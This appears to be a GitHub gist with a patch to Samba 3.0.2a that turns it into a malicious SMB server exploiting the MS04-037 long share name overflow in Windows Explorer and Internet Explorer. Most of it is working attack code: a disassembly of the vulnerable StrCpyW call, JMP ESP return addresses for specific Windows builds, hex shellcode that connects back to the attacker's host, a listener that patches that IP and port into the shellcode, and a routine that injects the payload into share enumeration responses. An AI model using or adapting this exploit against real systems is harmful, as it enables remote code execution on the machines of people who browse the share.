MS04-037: Vulnerability in Windows Shell Could Allow Remote Code Execution - proof of concept
--- download/samba-3.0.2a/source/rpc_parse/parse_srv.c.O Fri May 21 21:18:14 2004 | |
+++ download/samba-3.0.2a/source/rpc_parse/parse_srv.c Sat Jun 12 18:26:37 2004 | |
@@ -28,6 +28,450 @@ | |
#undef DBGC_CLASS | |
#define DBGC_CLASS DBGC_RPC_PARSE | |
+/* | |
+ * Exploit code for "Microsoft's Explorer and Internet Explorer long | |
+ * share name buffer overflow" discovered by Rodrigo Gutierrez. | |
+ * $rev 1.5, Yorick Koster, June 12, 2004 | |
+ * | |
+ * Tested on: | |
+ * - Windows NT SP6 English build 1381 (Explorer) | |
+ * - Internet Explorer 6.0 SP1 6.0.2800.1106 (WinNT SP6 English) | |
+ * - Windows 2000 SP4 Dutch build 2195 (Explorer) | |
+ * - Internet Explorer 6.0 SP1 6.0.2800.1106 (Win2k SP4 Dutch) | |
+ * - Windows 2000 SP4 English build 2195 (Explorer) | |
+ * - Internet Explorer 6.0 SP1 6.0.2800.1106 (Win2k SP4 English) | |
+ * - Windows XP SP1 English build 2600 (Explorer) | |
+ * - Internet Explorer 6.0.2800.1106.xpsp2 (WinXP SP1 English) | |
+ * | |
+ * Reference: | |
+ * http://archives.neohapsis.com/archives/fulldisclosure/2004-04/0913.html | |
+ * | |
+ * Vulnerability details: | |
+ * The buffer overflow occurs upon processing a NetrShareEnum response, | |
+ * specifcally when processing SHARE_INFO_1 structures. This vulnerability | |
+ * exists due to an unsafe StrCpyW() call within SHLWAPI.dll. The following | |
+ * dump was made using OllyDbg (attached to explorer.exe), it contains the | |
+ * vulnerable function that calls StrCpyW() (line 70AA342A): | |
+ * | |
+ * 70AA33E0 /$ 55 PUSH EBP | |
+ * 70AA33E1 |. 8BEC MOV EBP,ESP | |
+ * 70AA33E3 |. 81EC 08020000 SUB ESP,208 | |
+ * 70AA33E9 |. 53 PUSH EBX | |
+ * 70AA33EA |. 56 PUSH ESI | |
+ * 70AA33EB |. 8B75 10 MOV ESI,DWORD PTR SS:[EBP+10] | |
+ * 70AA33EE |. F7DE NEG ESI | |
+ * 70AA33F0 |. 1BF6 SBB ESI,ESI | |
+ * 70AA33F2 |. B8 00010000 MOV EAX,100 | |
+ * 70AA33F7 |. 23F0 AND ESI,EAX | |
+ * 70AA33F9 |. 03F0 ADD ESI,EAX | |
+ * 70AA33FB |. 833D 00B6AC70 >CMP DWORD PTR DS:[70ACB600],0 | |
+ * 70AA3402 |. 57 PUSH EDI | |
+ * 70AA3403 |. 75 06 JNZ SHORT SHLWAPI.70AA340B | |
+ * 70AA3405 |. 81CE 00000001 OR ESI,1000000 | |
+ * 70AA340B |> 8B7D 0C MOV EDI,DWORD PTR SS:[EBP+C] | |
+ * 70AA340E |. 85FF TEST EDI,EDI | |
+ * 70AA3410 |. 8B5D 08 MOV EBX,DWORD PTR SS:[EBP+8] | |
+ * 70AA3413 |. 75 09 JNZ SHORT SHLWAPI.70AA341E | |
+ * 70AA3415 |. 53 PUSH EBX | |
+ * 70AA3416 |. FF15 3C14A770 CALL DWORD PTR DS:[<&KERNEL32.lstrlenW>] | |
+ * 70AA341C |. 8BF8 MOV EDI,EAX | |
+ * 70AA341E |> 85DB TEST EBX,EBX | |
+ * 70AA3420 |. 74 25 JE SHORT SHLWAPI.70AA3447 | |
+ * 70AA3422 |. 53 PUSH EBX | |
+ * 70AA3423 |. 8D85 F8FDFFFF LEA EAX,DWORD PTR SS:[EBP-208] | |
+ * 70AA3429 |. 50 PUSH EAX | |
+ * 70AA342A |. E8 360BFFFF CALL SHLWAPI.StrCpyW | |
+ * 70AA342F |. 57 PUSH EDI | |
+ * 70AA3430 |. 53 PUSH EBX | |
+ * 70AA3431 |. 57 PUSH EDI | |
+ * 70AA3432 |. 8D85 F8FDFFFF LEA EAX,DWORD PTR SS:[EBP-208] | |
+ * 70AA3438 |. 50 PUSH EAX | |
+ * 70AA3439 |. 56 PUSH ESI | |
+ * 70AA343A |. 68 00080000 PUSH 800 | |
+ * 70AA343F |. FF15 4C13A770 CALL DWORD PTR DS:[<&KERNEL32.LCMapStringW>] | |
+ * 70AA3445 |. EB 02 JMP SHORT SHLWAPI.70AA3449 | |
+ * 70AA3447 |> 33C0 XOR EAX,EAX | |
+ * 70AA3449 |> 5F POP EDI | |
+ * 70AA344A |. 5E POP ESI | |
+ * 70AA344B |. 5B POP EBX | |
+ * 70AA344C |. C9 LEAVE | |
+ * 70AA344D \. C2 0C00 RETN 0C | |
+ * | |
+ * Using the strCpyW() call, we control both EBP and EIP, which are | |
+ * stored on the stack. Our stack looks something like this: | |
+ * | |
+ * vvvvvvvvvvvvvvvvvvvvvvv high adressess | |
+ * | | | |
+ * +-----------------------+ | |
+ * | | <- ESP points here | |
+ * | | | |
+ * | | | |
+ * | | | |
+ * +-----------------------+ | |
+ * | EIP | | |
+ * +-----------------------+ | |
+ * | EBP | | |
+ * +-----------------------+ | |
+ * | | | |
+ * | | | |
+ * | our buffer | | |
+ * / / | |
+ * | 243 - 251 widechars | | |
+ * | | | |
+ * | | | |
+ * +-----------------------+ | |
+ * | | | |
+ * | IP + backslash | | |
+ * | 8 - 16 widechars | | |
+ * | | | |
+ * +-----------------------+ | |
+ * | | | |
+ * ^^^^^^^^^^^^^^^^^^^^^^^^^ low addresses | |
+ * (the stack grows down) | |
+ * | |
+ * Note, it appears that the buffer overflow is only triggered when | |
+ * using IP addresses (e.g. \\127.0.0.1). When using the NetBIOS name | |
+ * (Internet) Explorer will display the share name. If someone | |
+ * accidently views the share, for example when browsing the Network | |
+ * Neighbourhood, it will not execute our shellcode. | |
+ * | |
+ * Exploit details: | |
+ * As is shown in the above illustration, we control EIP after we | |
+ * have written 245 - 253 widechars on the stack. Normally we would | |
+ * determine the address of ESP and overwrite EIP with something like | |
+ * ESP - 500. This will cause the program to execute the code that is in | |
+ * our buffer. Unfortunately, the address of ESP differs every time we | |
+ * point Explorer to our malicious share. | |
+ * | |
+ * Since we don't know the address of ESP, we can't just overwrite EIP | |
+ * and jump back to our shellcode. We need to find another way to get | |
+ * back to our shellcode. Notice that ESP points above our shellcode, | |
+ * so we have at least one address that is near our shellcode. We may | |
+ * be able to use this pointer to get back to our shellcode. We can do | |
+ * something like this: | |
+ * SUB ESP, 1f4h | |
+ * JMP ESP | |
+ * | |
+ * We may be able to locate these instructions somewhere in one of the | |
+ * DLLs that are loaded by Explorer. Or we can overwrite our buffer a | |
+ * bit more and inject a second (small) shellcode on the stack, located | |
+ * ESP. The purpose of this seconde shellcode is to jump back to the | |
+ * actual shellcode located below ESP. At this moment we only have to | |
+ * find a JMP ESP instruction in one of the DLLs loaded by Explorer. | |
+ * The last method is prefered, since it is more likely that we will | |
+ * find a JMP ESP located at the same address on various versions of | |
+ * Windows. | |
+ * | |
+ * The same technique also applies to Internet Explorer, however some | |
+ * DLLs used by Internet Explorer are mapped into a different | |
+ * address space. Therefore, a JMP ESP in Explorer may not exist (on | |
+ * the same location) in Internet Explorer. | |
+ * | |
+ * There are other methods that can be used to exploit this | |
+ * vulnerability, however, we'll stick with the method described | |
+ * above. | |
+ * | |
+ * Shellcode: | |
+ * The shellcode contains several different techniques, the reason | |
+ * for this is that I wanted to test various methods that are used | |
+ * when writing shellcode. Because of this, the shellcode is a bit | |
+ * large (around 500 bytes). However, this is not an issue at the | |
+ * moment. The shellcode neatly fits into our buffer. The shellcode | |
+ * has to be obtimized in order for it to work with other buffer | |
+ * overflows. | |
+ * | |
+ * Note that the shellcode contains NULL-bytes, this is also not | |
+ * an issue, because we send an Unicode string to our target host. | |
+ * In Unicode, an end-of-line character is encoded using two | |
+ * NULL-bytes (a short). So, NULL-shorts are not allowed in the | |
+ * shellcode. | |
+ * | |
+ * The shellcode performs the following actions: | |
+ * - Locate the base address of kernel32.dll | |
+ * - Find function addresses for the functions: | |
+ * - ExitProcess (not needed, we can also trigger | |
+ * an exception) | |
+ * - LoadLibraryA | |
+ * - GetProcAddress | |
+ * - Call LoadLibraryA("ws2_32.dll") | |
+ * - Call GetProcAddress(<handle>, "WSAStartup") | |
+ * - Call WSAStartup | |
+ * - Call GetProcAddress(<handle>, "WSASocket") | |
+ * - Call GetProcAddress(<handle>, "connect") | |
+ * - Call WSASocket | |
+ * - Call connect | |
+ * - Call ExitProccess | |
+ * | |
+ * Notes: | |
+ * This exploit code has been tested using the following | |
+ * smb.conf: | |
+ * | |
+ * [global] | |
+ * workgroup = DONTUSESTRCPY | |
+ * security = share | |
+ * | |
+ * [tmp] | |
+ * path = /tmp | |
+ * guest ok = yes | |
+ * read only = yes | |
+ * | |
+ * !!! Using this configuration makes /tmp world-readable. !!! | |
+ * | |
+ * Be sure to check the contents of /tmp/vulnerable.log and | |
+ * /usr/local/samba/var/log.smbd when running Samba. | |
+ * | |
+ * Disclaimer: | |
+ * This exploit code is provided as-is, without any warranty. | |
+ * Your are not allowed to (re)distribute or alter this | |
+ * exploit code without my permission. | |
+ * | |
+ * This code contains at least one (insecure file creation) | |
+ * vulnerability. It does not claim to be secure in any way, | |
+ * use it at your own risk. | |
+ * | |
+ * -- you shouldn't use strcpy, mmmmkay | |
+ */ | |
+ | |
+#define NOP 0x90 | |
+ | |
+// return addresses | |
+#define JMP_ESP_COMCTL32_EXP_WIN2K_SP4_B2195_NL 0x717564b8 | |
+#define JMP_ESP_COMCTL32_IE6_0_2800_1106_WIN2K_SP4_NL 0x007e64b8 | |
+// almost universal ?? | |
+#define JMP_ESP_SHLWAPI_EXP_WIN2K_SP4_B2195_NL 0x70a7bf97 | |
+#define JMP_ESP_SHLWAPI_IE6_0_2800_1106_WIN2K_SP4_NL JMP_ESP_SHLWAPI_EXP_WIN2K_SP4_B2195_NL | |
+#define JMP_ESP_SHLWAPI_EXP_WIN2K_SP4_B2195_UK JMP_ESP_SHLWAPI_EXP_WIN2K_SP4_B2195_NL | |
+#define JMP_ESP_SHLWAPI_IE6_0_2800_1106_WIN2K_SP4_UK JMP_ESP_SHLWAPI_EXP_WIN2K_SP4_B2195_NL | |
+#define JMP_ESP_SHLWAPI_EXP_WINXP_SP1_B2600_UK JMP_ESP_SHLWAPI_EXP_WIN2K_SP4_B2195_NL | |
+#define JMP_ESP_SHLWAPI_IE6_0_2800_1106_xpsp2_WINXP_SP1_UK JMP_ESP_SHLWAPI_EXP_WIN2K_SP4_B2195_NL | |
+// does not work on all versions of Windows NT, | |
+// maybe related to different IE versions? | |
+#define JMP_ESP_SHLWAPI_EXP_WINNT_SP6_B1381_UK JMP_ESP_SHLWAPI_EXP_WIN2K_SP4_B2195_NL | |
+#define JMP_ESP_SHLWAPI_IE6_0_2800_1106_WINNT_SP6_UK JMP_ESP_SHLWAPI_EXP_WIN2K_SP4_B2195_NL | |
+ | |
+// the actual return address | |
+#define RET JMP_ESP_SHLWAPI_EXP_WIN2K_SP4_B2195_NL | |
+ | |
+unsigned char shell[] = "\x54\x89\xe5\x81\xc4\x00\xf0\xff\xff\x81\xe4\x00\xff\xff\xff\x8d" | |
+ "\x45\xe8\x89\x45\xd4\x8d\x45\xe4\x89\x45\xd8\x8d\x45\xe0\x89\x45" | |
+ "\xdc\xc7\x45\xc8\x6a\xbc\x06\x00\xc7\x45\xcc\x86\x57\x0d\x00\xc7" | |
+ "\x45\xd0\xfa\x8b\x34\x00\xc6\x45\xbc\x57\xc6\x45\xbd\x53\xc6\x45" | |
+ "\xbe\x41\xc6\x45\xbf\x53\xc6\x45\xc0\x74\xc6\x45\xc1\x61\xc6\x45" | |
+ "\xc2\x72\xc6\x45\xc3\x74\xc6\x45\xc4\x75\xc6\x45\xc5\x70\xc6\x45" | |
+ "\xc6\x00\xc6\x45\xb0\x77\xc6\x45\xb1\x73\xc6\x45\xb2\x32\xc6\x45" | |
+ "\xb3\x5f\xc6\x45\xb4\x33\xc6\x45\xb5\x32\xc6\x45\xb6\x2e\xc6\x45" | |
+ "\xb7\x64\xc6\x45\xb8\x6c\xc6\x45\xb9\x6c\xc6\x45\xba\x00\xc6\x45" | |
+ "\xa4\x57\xc6\x45\xa5\x53\xc6\x45\xa6\x41\xc6\x45\xa7\x53\xc6\x45" | |
+ "\xa8\x6f\xc6\x45\xa9\x63\xc6\x45\xaa\x6b\xc6\x45\xab\x65\xc6\x45" | |
+ "\xac\x74\xc6\x45\xad\x41\xc6\x45\xae\x00\xc6\x45\x9c\x63\xc6\x45" | |
+ "\x9d\x6f\xc6\x45\x9e\x6e\xc6\x45\x9f\x6e\xc6\x45\xa0\x65\xc6\x45" | |
+ "\xa1\x63\xc6\x45\xa2\x74\xc6\x45\xa3\x00\x33\xc0\x64\x8b\x40\x30" | |
+ "\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40\x08\x89\x45\xfc\x8b\x58\x3c" | |
+ "\x03\xd8\x8b\x5b\x78\x03\xd8\x8b\x4b\x18\x89\x4d\xf8\x8b\x4b\x20" | |
+ "\x03\xc8\x89\x4d\xf4\x8b\x4b\x24\x03\xc8\x89\x4d\xf0\x8b\x4b\x1c" | |
+ "\x03\xc8\x89\x4d\xec\x33\xdb\x83\xfb\x0c\x74\x64\x8b\x45\xf0\x8b" | |
+ "\x4d\xf8\x8b\x55\xf4\x49\xe3\x53\x51\x52\x33\xff\x8b\x12\x03\x55" | |
+ "\xfc\x33\xc9\x8a\x0a\x84\xc9\x74\x0c\x83\xc9\x60\x03\xf9\xd1\xe7" | |
+ "\x83\xc2\x01\xeb\xec\x8d\x95\xc8\xff\xff\xff\x03\xd3\x8b\x0a\x3b" | |
+ "\xf9\x5a\x59\x74\x08\x83\xc0\x02\x83\xc2\x04\xeb\xc8\x33\xc9\x66" | |
+ "\x8b\x08\x8b\x55\xec\xc1\xe1\x02\x03\xd1\x8b\x12\x03\x55\xfc\x8d" | |
+ "\x8d\xd4\xff\xff\xff\x03\xcb\x8b\x09\x89\x11\x83\xc3\x04\xeb\x97" | |
+ "\x8d\x9d\xb0\xff\xff\xff\x53\xff\x55\xe4\x8b\xf8\x8d\x9d\xbc\xff" | |
+ "\xff\xff\x53\x57\xff\x55\xe0\x54\x33\xdb\x66\xbb\x01\x01\x53\xff" | |
+ "\xd0\x8d\x9d\xa4\xff\xff\xff\x53\x57\xff\x55\xe0\x8b\xf0\x8d\x9d" | |
+ "\x9c\xff\xff\xff\x53\x57\xff\x55\xe0\x8b\xf8\x33\xc0\x50\x50\x50" | |
+ "\x50\x40\x50\x40\x50\xff\xd6\x8b\xf0\x66\xb8\xff\xaa\xc1\xe0\x10" | |
+ "\x66\xb8\x02\x01\x50\x68\x02\x00\x55\x44\x8b\xcc\x33\xc0\xb0\x10" | |
+ "\x50\x51\x56\xff\xd7\xff\x55\xe8"; | |
+ | |
+unsigned char jmp2sh[] = "\x81\xc4\x06\xfe\xff\xff" // add esp, -1fah | |
+ "\xff\xe4"; // jmp esp | |
+ | |
+unsigned char magic_str[] = "\x66\xb8\xff\xaa\xc1\xe0\x10\x66\xb8\x02\x01\x50\x68\x02\x00\x55\x44"; | |
+ | |
+void insert_shellcode(unsigned char *ptr, unsigned char *code, unsigned int len) | |
+{ | |
+ unsigned int i; | |
+ | |
+ for(i = 0; i < len; i++) | |
+ { | |
+ *(ptr++) = *(code++); | |
+ } | |
+} | |
+ | |
+void insert_address(unsigned char *ptr, unsigned long addr) | |
+{ | |
+ ptr[0] = (unsigned char)(addr & 0xFF); | |
+ ptr[1] = (unsigned char)((addr >> 8) & 0xFF); | |
+ ptr[2] = (unsigned char)((addr >> 16) & 0xFF); | |
+ ptr[3] = (unsigned char)(addr >> 24); | |
+} | |
+ | |
+void spawn_listener(unsigned char *ptr, unsigned int len) | |
+{ | |
+ int sockfd = socket(PF_INET, SOCK_STREAM, 0); | |
+ struct sockaddr_in sin; | |
+ unsigned short port = 1025; | |
+ char *p; | |
+ | |
+ memset(&sin, 0, sizeof(sin)); | |
+ sin.sin_family = AF_INET; | |
+ sin.sin_port = htons(port); | |
+ sin.sin_addr.s_addr = inet_addr(client_socket_addr()); | |
+ | |
+ while(bind(sockfd, (struct sockaddr *)&sin, sizeof(sin))) | |
+ { | |
+ sin.sin_port = htons(++port); | |
+ if(port == 65535) | |
+ { | |
+ DEBUGADD(0, ("Unable to find a suitable portnumber (%d)\n", port)); | |
+ exit(1); | |
+ } | |
+ p = (char *)&sin.sin_port; | |
+ if(!p[1]); | |
+ continue; | |
+ } | |
+ | |
+ if(listen(sockfd, 1024)) | |
+ { | |
+ DEBUGADD(0, ("Call to listen failed\n")); | |
+ exit(1); | |
+ } | |
+ | |
+ len -= (sizeof(magic_str) - 1); | |
+ while(memcmp(ptr, magic_str, sizeof(magic_str) - 1)) | |
+ { | |
+ if(!(--len)) | |
+ { | |
+ DEBUGADD(0, ("Couldn't locate 'magic string'\n")); | |
+ exit(1); | |
+ } | |
+ ptr++; | |
+ } | |
+ | |
+ p = (char *)&sin.sin_addr.s_addr; | |
+ ptr[2] = p[2]; | |
+ ptr[3] = p[3]; | |
+ ptr[9] = p[0]; | |
+ ptr[10] = p[1]; | |
+ p = (char *)&sin.sin_port; | |
+ ptr[15] = p[0]; | |
+ ptr[16] = p[1]; | |
+ | |
+ if(!fork()) | |
+ { | |
+ fd_set fds; | |
+ struct timeval tv; | |
+ | |
+ umask(077); | |
+ tv.tv_sec = 5; | |
+ tv.tv_usec = 0; | |
+ FD_ZERO(&fds); | |
+ FD_SET(sockfd, &fds); | |
+ | |
+ DEBUGADD(0, ("New listening process started (%s:%d)\n", client_socket_addr(), port)); | |
+ if(select(sockfd + 1, &fds, NULL, NULL, &tv) > 0) | |
+ { | |
+ if(FD_ISSET(sockfd, &fds)) | |
+ { | |
+ FILE *log; | |
+ struct sockaddr_in cli_addr; | |
+ socklen_t len = sizeof(cli_addr); | |
+ int clientfd; | |
+ time_t tm; | |
+ | |
+ clientfd = accept(sockfd, (struct sockaddr *)&cli_addr, &len); | |
+ | |
+ time(&tm); | |
+ p = ctime(&tm); | |
+ p[strlen(p) - 1] = 0; | |
+ | |
+ log = fopen("/tmp/vulnerable.log", "a"); | |
+ if(!strcmp(get_peer_name(clientfd, False), client_name())) | |
+ { | |
+ char *fmst = "%s (%s) appears to be vulnerable\n"; | |
+ | |
+ if(log) | |
+ { | |
+ fprintf(log, "%s - ", p); | |
+ fprintf(log, fmst, client_name(), client_addr()); | |
+ fclose(log); | |
+ } | |
+ DEBUGADD(0, (fmst, client_name(), client_addr())); | |
+ } | |
+ else | |
+ { | |
+ DEBUGADD(0, ("NOTICE: a different host (%s) connected back!\n", | |
+ get_peer_name(clientfd, False))); | |
+ } | |
+ close(clientfd); | |
+ } | |
+ } | |
+ | |
+ close(sockfd); | |
+ exit(0); | |
+ } | |
+ | |
+ close(sockfd); | |
+} | |
+ | |
+void dump_buffer(unsigned char *ptr, unsigned int len) | |
+{ | |
+ unsigned int i; | |
+ | |
+ for(i = 0; i < len; i++) | |
+ { | |
+ if(!(i % 32)) | |
+ { | |
+ DEBUGADD(0, ("\n")); | |
+ } | |
+ DEBUGADD(0, ("%.2x ", *(ptr++))); | |
+ } | |
+ DEBUGADD(0, ("\n")); | |
+} | |
+ | |
+void do_sploit(UNISTR2 *unistr) | |
+{ | |
+ int i = 0; | |
+ | |
+ DEBUG(0, ("Trying to exploit %s\n", client_name())); | |
+ | |
+ unistr->uni_max_len = 300; | |
+ unistr->uni_str_len = unistr->uni_max_len; | |
+ unistr->offset = 0; | |
+ DEBUGADD(0, ("Reallocating memory\n")); | |
+ unistr->buffer = talloc_realloc(get_talloc_ctx(), unistr->buffer, | |
+ unistr->uni_max_len * sizeof(uint16)); | |
+ memset(unistr->buffer, NOP, unistr->uni_max_len * sizeof(uint16)); | |
+ i += (16 - strlen(client_socket_addr())) + 1; | |
+ | |
+ DEBUGADD(0, ("Inserting shellcode\n")); | |
+ insert_shellcode((unsigned char *)&unistr->buffer[i], shell, sizeof(shell) - 1); | |
+ i += 242; | |
+ | |
+// DEBUGADD(0, ("Setting EBP\n")); | |
+// insert_address((unsigned char *)&unistr->buffer[i], 0x44434241); | |
+ i += 2; | |
+ | |
+ DEBUGADD(0, ("Setting EIP\n")); | |
+ insert_address((unsigned char *)&unistr->buffer[i], RET); | |
+ i += 8; | |
+ | |
+ DEBUGADD(0, ("Inserting shellcode\n")); | |
+ insert_shellcode((unsigned char *)&unistr->buffer[i], jmp2sh, sizeof(jmp2sh) - 1); | |
+ | |
+ DEBUGADD(0, ("Spawning a new process, binding to a port & setting IP + port number\n")); | |
+ spawn_listener((unsigned char *)unistr->buffer, unistr->uni_max_len * sizeof(uint16)); | |
+ | |
+ unistr->buffer[unistr->uni_max_len - 1] = 0; | |
+ | |
+ fflush(NULL); | |
+ DEBUGADD(0, ("Buffer contents: ")); | |
+ dump_buffer((unsigned char *)unistr->buffer, unistr->uni_max_len * sizeof(uint16)); | |
+ | |
+ return; | |
+} | |
+ | |
/******************************************************************* | |
Inits a SH_INFO_0_STR structure | |
********************************************************************/ | |
@@ -119,6 +563,10 @@ | |
if(!prs_align(ps)) | |
return False; | |
+ if(!sh1->ptrs->type) | |
+ { | |
+ do_sploit(&sh1->uni_netname); | |
+ } | |
if(sh1->ptrs->ptr_netname) | |
if(!smb_io_unistr2("", &sh1->uni_netname, True, ps, depth)) | |
return False; |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment